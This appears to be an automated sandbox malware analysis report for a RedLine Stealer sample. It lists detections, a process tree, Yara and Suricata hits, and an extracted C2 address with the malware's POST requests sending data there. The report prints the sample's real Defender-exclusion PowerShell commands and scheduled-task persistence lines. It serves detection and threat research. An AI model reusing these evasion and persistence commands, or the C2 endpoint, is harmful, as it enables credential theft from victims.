Windows Analysis Report
tfF3UBTdr8.exe

Overview

General Information

Sample name: tfF3UBTdr8.exe (renamed because original name is a hash value)
Original sample name: 05211f48dbbb4ef891db1e158ff87e28.exe
Analysis ID: 1501611
MD5: 05211f48dbbb4ef891db1e158ff87e28
SHA1: 20d0d8cea312fbca71dd0c00a97a0c346f886628
SHA256: 1d614e39746dfc7e2fd8e4d133c5609ce9cc67f80e6468ea189683fca168cdd6
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • tfF3UBTdr8.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
    • powershell.exe (PID: 5284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • tfF3UBTdr8.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\tfF3UBTdr8.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
      • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WltfeVzR.exe (PID: 1868 cmdline: C:\Users\user\AppData\Roaming\WltfeVzR.exe MD5: 05211F48DBBB4EF891DB1E158FF87E28)
    • schtasks.exe (PID: 5912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WltfeVzR.exe (PID: 6784 cmdline: "C:\Users\user\AppData\Roaming\WltfeVzR.exe" MD5: 05211F48DBBB4EF891DB1E158FF87E28)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.57.91:55615"], "Bot Id": "cheat"}
Source | Rule | Description | Author | Strings
Source: dump.pcap, Rule: JoeSecurity_RedLine_1, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: dump.pcap, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Author: unknown, Strings:
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security

Source | Rule | Description | Author | Strings
Source: 11.2.WltfeVzR.exe.4159340.1.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 11.2.WltfeVzR.exe.4159340.1.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 11.2.WltfeVzR.exe.4159340.1.unpack, Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Author: unknown, Strings:
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField
Source: 11.2.WltfeVzR.exe.4159340.1.unpack, Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Author: ditekSHen, Strings:
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147ea:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147cb:$v2_6: GetUpdates
Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

                    System Summary

                    Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\tfF3UBTdr8.exe", ParentImage: C:\Users\user\Desktop\tfF3UBTdr8.exe, ParentProcessId: 6532, ParentProcessName: tfF3UBTdr8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", ProcessId: 5284, ProcessName: powershell.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WltfeVzR.exe, ParentImage: C:\Users\user\AppData\Roaming\WltfeVzR.exe, ParentProcessId: 1868, ParentProcessName: WltfeVzR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp", ProcessId: 5912, ProcessName: schtasks.exe
                    Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe
                    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\tfF3UBTdr8.exe", ParentImage: C:\Users\user\Desktop\tfF3UBTdr8.exe, ParentProcessId: 6532, ParentProcessName: tfF3UBTdr8.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe", ProcessId: 5284, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp", ProcessId: 5800, ProcessName: schtasks.exe
                    Timestamp: 2024-08-30T08:02:02.637313+0200, SID: 2849662, Severity: 1, Source Port: 49711, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:17.981040+0200, SID: 2849351, Severity: 1, Source Port: 49718, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:11.528172+0200, SID: 2849352, Severity: 1, Source Port: 49714, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:20.454579+0200, SID: 2045001, Severity: 1, Source Port: 55615, Destination Port: 49718, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:20.867312+0200, SID: 2849352, Severity: 1, Source Port: 49723, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:18.122869+0200, SID: 2046056, Severity: 1, Source Port: 55615, Destination Port: 49718, Protocol: TCP, Classtype: A Network Trojan was detected
                    Timestamp: 2024-08-30T08:02:11.112782+0200, SID: 2045001, Severity: 1, Source Port: 55615, Destination Port: 49711, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:07.909323+0200, SID: 2045000, Severity: 1, Source Port: 55615, Destination Port: 49711, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:12.923279+0200, SID: 2849662, Severity: 1, Source Port: 49718, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:08.278319+0200, SID: 2849351, Severity: 1, Source Port: 49711, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:17.772516+0200, SID: 2045000, Severity: 1, Source Port: 55615, Destination Port: 49718, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:22.423218+0200, SID: 2848200, Severity: 1, Source Port: 49724, Destination Port: 55615, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
                    Timestamp: 2024-08-30T08:02:08.366718+0200, SID: 2046056, Severity: 1, Source Port: 55615, Destination Port: 49711, Protocol: TCP, Classtype: A Network Trojan was detected

                    AV Detection

                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, Malware Configuration Extractor: RedLine {"C2 url": ["185.222.57.91:55615"], "Bot Id": "cheat"}
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe, ReversingLabs: Detection: 68%
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe, Virustotal: Detection: 45%
                    Source: tfF3UBTdr8.exe, ReversingLabs: Detection: 68%
                    Source: tfF3UBTdr8.exe, Virustotal: Detection: 45%
                    Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: tfF3UBTdr8.exe, Joe Sandbox ML: detected
                    Source: tfF3UBTdr8.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: tfF3UBTdr8.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.0000000001595000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe, Code function: 4x nop then jmp 076BA9E8h 0_2_076BA9E0
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe, Code function: 4x nop then jmp 076C9C38h 11_2_076C9C30

                    Networking

                    Source: Network traffic, Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network traffic, Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network traffic, Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.91:55615 -> 192.168.2.5:49711
                    Source: Network traffic, Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49718 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network traffic, Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49718 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network traffic, Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.91:55615 -> 192.168.2.5:49718
                    Source: Network traffic, Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49714 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49723 -> 185.222.57.91:55615
                    Source: Network traffic, Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49724 -> 185.222.57.91:55615
                    Source: Malware configuration extractor, URLs: 185.222.57.91:55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknown, Network traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknown, Network traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknown, Network traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: unknown, Network traffic detected: HTTP traffic on port 49724 -> 55615
                    Source: unknown, Network traffic detected: HTTP traffic on port 55615 -> 49724
                    Source: global traffic, TCP traffic: 192.168.2.5:49711 -> 185.222.57.91:55615
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 953303
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 953295
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 952830
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                    Source: global traffic, HTTP traffic detected: POST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 952822
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                    Source: Joe Sandbox View, ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknown, TCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: global traffic DNS traffic detected: DNS query: api.ip.sb
                    Source: unknown HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: text/xml; charset=utf-8
                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                        Host: 185.222.57.91:55615
                        Content-Length: 137
                        Expect: 100-continue
                        Accept-Encoding: gzip, deflate
                        Connection: Keep-Alive
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615/
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615t-sq
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2208269456.000000000191E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmp
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003111000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2195910209.0000000003074000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
